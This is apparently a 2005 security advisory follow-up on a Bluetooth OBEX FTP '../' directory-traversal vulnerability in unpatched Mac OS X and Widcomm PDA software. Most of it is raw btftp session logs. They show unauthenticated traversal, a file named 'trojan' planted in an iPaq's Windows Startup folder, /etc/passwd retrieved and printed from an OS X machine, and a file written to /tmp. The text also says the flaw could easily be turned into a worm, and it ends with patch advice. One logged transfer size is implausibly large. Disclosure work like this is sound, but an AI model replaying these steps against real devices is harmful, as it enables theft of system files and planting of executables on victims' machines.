in DMA[2005-0502a] I stated that "...I can not confirm nor deny that files can be placed or retrieved via OBEX FTP and the ../../ method. I have only been able to list files using my current obex client (Against Mac OSX). With a modified version of btftp from Affix-3.2.0 I am now able to confirm that an attacker also has the ability to both grab and put files outside of the default drop path when using OBEX ftp. Zero authentication is required on OSX if an unpatched machine is being used. I can also now state that Widcomm software on PDA's are also affected. This is NOT the same as my object push ../ vulnerability. This Widcomm bug is yet another bug that has not been disclosed in the past. Some PDA's require authentication for OBEX ftp ... some do not. Here is an example attack against my HP Ipaq 2215 animosity:/usr/src/affix-3.2.0# btftp Affix version: Affix 3.2.0 Welcome to btftp (OBEX) tool. Type ? for help. Mode: Bluetooth ftp> open 00:04:3e:65:a1:c8 Service found on channel: 3 Connected. ftp> ls -rwdx 634 eyiot447.pwi drwdx 0 Business drwdx 0 Personal drwdx 0 Templates Command complete. ftp> cd ../ Command complete. ftp> ls drwdx 0 .. Command complete. ftp> cd Windows Command complete. ftp> cd Startup Command complete. ftp> put /etc/hosts trojan Transfer started... Transfer complete. 257 bytes sent in 0.5 secs (5140.00 B/s) ftp> ls trojan Browsing error: OBEX error: Internal server error (0x50) ftp> If I go to the iPaq and browse the folder in question the file is sitting right where I placed it. Here is an example attack against my Apple OSX machine this shows me grabbing /etc/passwd animosity:/usr/src/affix-3.2.0# btftp Affix version: Affix 3.2.0 Welcome to btftp (OBEX) tool. Type ? for help. Mode: Bluetooth ftp> open 00:11:95:4f:60:1f Service found on channel: 15 Connected. ftp> ls d---- 0 Faxes d---- 0 New Folder d---- 0 SC Info Command complete. ftp> cd ../ Command complete. ftp> ls d---- 0 .. ----- 195662 4D WebSTAR Installer.log d---- 0 johnh d---- 0 kevinfinisterre d---- 0 Shared d---- 0 webstar Command complete. ftp> cd ../ Command complete. ftp> ls d---- 0 .. d---- 0 Applications d---- 0 automount d---- 0 bin d---- 0 cores ----- 3584 Desktop DB ----- 4482 Desktop DF d---- 0 dev d---- 0 Developer ----- 11 etc d---- 0 File Transfer Folder d---- 0 Library ----- 9 mach ----- 571184 mach.sym ----- 3872560 mach_kernel d---- 0 Network d---- 0 private d---- 0 sbin d---- 0 System ----- 11 tmp d---- 0 Users d---- 0 usr ----- 11 var d---- 0 Volumes Command complete. ftp> cd etc Command complete. ftp> ls d---- 0 .. ----- 753 6to4.conf ----- 515 afpovertcp.cfg ----- 15 aliases ----- 16384 aliases.db ----- 1046 amd.conf.template ----- 112 amd.map.template d---- 0 auth ----- 14761 authorization ----- 16541 authorization.cac ----- 160 bashrc d---- 0 charset ----- 295 crontab ----- 189 csh.cshrc ----- 83 csh.login ----- 39 csh.logout d---- 0 cups ----- 24 daily d---- 0 defaults ----- 0 dumpdates ----- 695 efax.rc ----- 0 find.codes d---- 0 fonts ----- 293 fstab ----- 150 fstab.hd ----- 119 ftpusers ----- 576 gdb.conf ----- 5678 gettytab ----- 699 group ----- 491 hostconfig ----- 492 hostconfig~ ----- 0 hosts.equiv ----- 0 hosts.lpd d---- 0 httpd d---- 0 idmap ----- 2893 inetd.conf ----- 12 kcpassword ----- 0 kern_loader.conf ----- 30 localtime ----- 131072 lowcase.dat d---- 0 mach_init.d d---- 0 mach_init_per_user.d ----- 105 mail.rc ----- 891 manpath.config ----- 1259 master.passwd ----- 88039 moduli ----- 28 monthly ----- 19 motd ----- 905 named.conf ----- 53 networks ----- 132 notify.conf ----- 44 ntp.conf d---- 0 openldap d---- 0 pam.d ----- 1374 passwd d---- 0 pdb d---- 0 periodic ----- 38693 php.ini.default d---- 0 postfix d---- 0 ppp ----- 125 profile ----- 5766 protocols d---- 0 racoon ----- 8099 rc ----- 3572 rc.boot ----- 4178 rc.cleanup ----- 2356 rc.common ----- 4763 rc.netboot ----- 20 resolv.conf d---- 0 resolver ----- 13 rmt ----- 0 rmtab ----- 971 rpc ----- 983 rtadvd.conf ----- 572576 services ----- 170 shells ----- 52 slpsa.conf ----- 1732 smb.conf ----- 1144 ssh_config ----- 668 ssh_host_dsa_key ----- 590 ssh_host_dsa_key.pub ----- 515 ssh_host_key ----- 319 ssh_host_key.pub ----- 883 ssh_host_rsa_key ----- 210 ssh_host_rsa_key.pub ----- 2409 sshd_config ----- 361 sudoers ----- 798 syslog.conf ----- 2442 ttys ----- 131072 upcase.dat ----- 65536 valid.dat d---- 0 vfs ----- 26 weekly ----- 238 xinetd.conf d---- 0 xinetd.d ----- 0 xtab Command complete. ftp> get passwd Transfer started... Transfer complete. 268564544 bytes received in 0.34 secs (789895717.65 B/s) animosity:/usr/local/bin# cat passwd ## # User Database # # Note that this file is consulted when the system is running in single-user # mode. At other times this information is handled by one or more of: # lookupd DirectoryServices # By default, lookupd gets information from NetInfo, so this file will # not be consulted unless you have changed lookupd's configuration. # This file is used while in single user mode. # # To use this file for normal authentication, you may enable it with # /Applications/Utilities/Directory Access. ## nobody:*:-2:-2:Unprivileged User:/:/usr/bin/false root:*:0:0:System Administrator:/var/root:/bin/sh daemon:*:1:1:System Services:/var/root:/usr/bin/false smmsp:*:25:25:Sendmail User:/private/etc/mail:/usr/bin/false lp:*:26:26:Printing Services:/var/spool/cups:/usr/bin/false postfix:*:27:27:Postfix User:/var/spool/postfix:/usr/bin/false www:*:70:70:World Wide Web Server:/Library/WebServer:/usr/bin/false eppc:*:71:71:Apple Events User:/var/empty:/usr/bin/false mysql:*:74:74:MySQL Server:/var/empty:/usr/bin/false sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false qtss:*:76:76:QuickTime Streaming Server:/var/empty:/usr/bin/false cyrus:*:77:6:Cyrus User:/var/imap:/usr/bin/false mailman:*:78:78:Mailman user:/var/empty:/usr/bin/false appserver:*:79:79:Application Server:/var/empty:/usr/bin/false unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false This shows me placing a file in /tmp Affix version: Affix 2.1.1 Wellcome to OBEX ftp. Type ? for help. Mode: Bluetooth SDP: yes ftp> open 00:11:95:4f:60:1f Connected. ftp> ls d---- 0 Faxes d---- 0 New Folder d---- 0 SC Info Command complete. ftp> cd ../ Command complete. ftp> cd ../ Command complete. ftp> cd tmp Command complete. ftp> ls d---- 0 .. Command complete. ftp> put /etc/hosts hosts Transfer started... Transfer complete. 257 bytes sent in 0.10 secs (2570.00 B/s) ftp> ls d---- 0 .. d---- 0 501 ----- 257 hosts Command complete. Keep in mind that you are using the permissions of the currently logged in user so you may not have access to everything. It seems pretty trivial to turn these issues into a worm or some other form of automated attack. Please apply your Apple updates and turn off that Widcomm stuff if you aren't using it! Do NOT accept requests from unknown bluetooth sources. enjoy. -KF